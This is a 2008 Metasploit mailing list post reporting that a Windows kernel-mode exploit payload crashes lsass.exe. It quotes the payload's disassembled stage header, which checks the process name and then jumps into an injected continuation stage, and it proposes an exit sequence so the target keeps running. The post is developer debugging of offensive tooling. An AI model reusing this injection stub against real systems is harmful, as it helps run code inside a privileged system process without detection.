Metasploit mailing list archives
Mistake in kernel mode payloads
From: overet at securitydate.it (Giuseppe Gottardi)
Date: Wed, 27 Feb 2008 01:27:24 +0100
Hi mans, I have a little trouble with windows kernel mode exploitation. When an user land payload is executed in the context of lsass.exe process, it forces the process lsass.exe to exit and the system shut down after 60 seconds due to lsass.exe system error. I think that it occurs because the payload don't terminate with: 61 popa FF250803FE7F jmp near [0x7ffe0308] In fact, stage header code supplied by metasploit has this code: ; Preserve the calling environment 0000003F 60 pusha 00000040 6A30 push byte +0x30 00000042 58 pop eax 00000043 99 cdq 00000044 648B18 mov ebx,[fs:eax] ; Check if Peb->Ldr is NULL 00000047 39530C cmp [ebx+0xc],edx 0000004A 7426 jz 0x72 ; Extract Peb->ProcessParameters->ImagePathName.Buffer 0000004C 8B5B10 mov ebx,[ebx+0x10] 0000004F 8B5B3C mov ebx,[ebx+0x3c] ; Add 0x28 to the image path name (skip past c:\windows\system32\) 00000052 83C328 add ebx,byte +0x28 ; Compare the name of the executable with lass 00000055 8B0B mov ecx,[ebx] 00000057 034B03 add ecx,[ebx+0x3] 0000005A 81F96C617373 cmp ecx,0x7373616c ; If it doesn't match, execute the original system call dispatcher 00000060 7510 jnz 0x72 00000062 648B18 mov ebx,[fs:eax] 00000065 43 inc ebx 00000066 43 inc ebx 00000067 43 inc ebx ; Check if Peb->SpareBool is 1, if it is, execute the original ; system call dispatcher 00000068 803B01 cmp byte [ebx],0x1 0000006B 7405 jz 0x72 ; Set Peb->SpareBool to 1 0000006D C60301 mov byte [ebx],0x1 ; Jump into the continuation stage 00000070 EB07 jmp short 0x79 ; Restore the calling environment and execute the original system call ; dispatcher that was preserved in 0x7ffe0308 00000072 61 popa 00000073 FF250803FE7F jmp near [0x7ffe0308] ; continuation of the stage When in the first execution of the stage header the flow is directed to the stage (00000070) there's no way to restore the registers and jump to 0x7ffe0308, so the lsass.exe die. Doing some tests I put: 61 popa FF250803FE7F jmp near [0x7ffe0308] as "exit code" instructions, and the system could continue to live without problems. Do you have some suggestion to do this in metasploit? Regards, oveRet
Current thread:
- Mistake in kernel mode payloads Giuseppe Gottardi (Feb 26)
- Mistake in kernel mode payloads mmiller at hick.org (Feb 26)
- Mistake in kernel mode payloads Giuseppe Gottardi (Mar 11)
- Mistake in kernel mode payloads Matt Miller (Mar 11)
- Mistake in kernel mode payloads Giuseppe Gottardi (Mar 11)
- Mistake in kernel mode payloads mmiller at hick.org (Feb 26)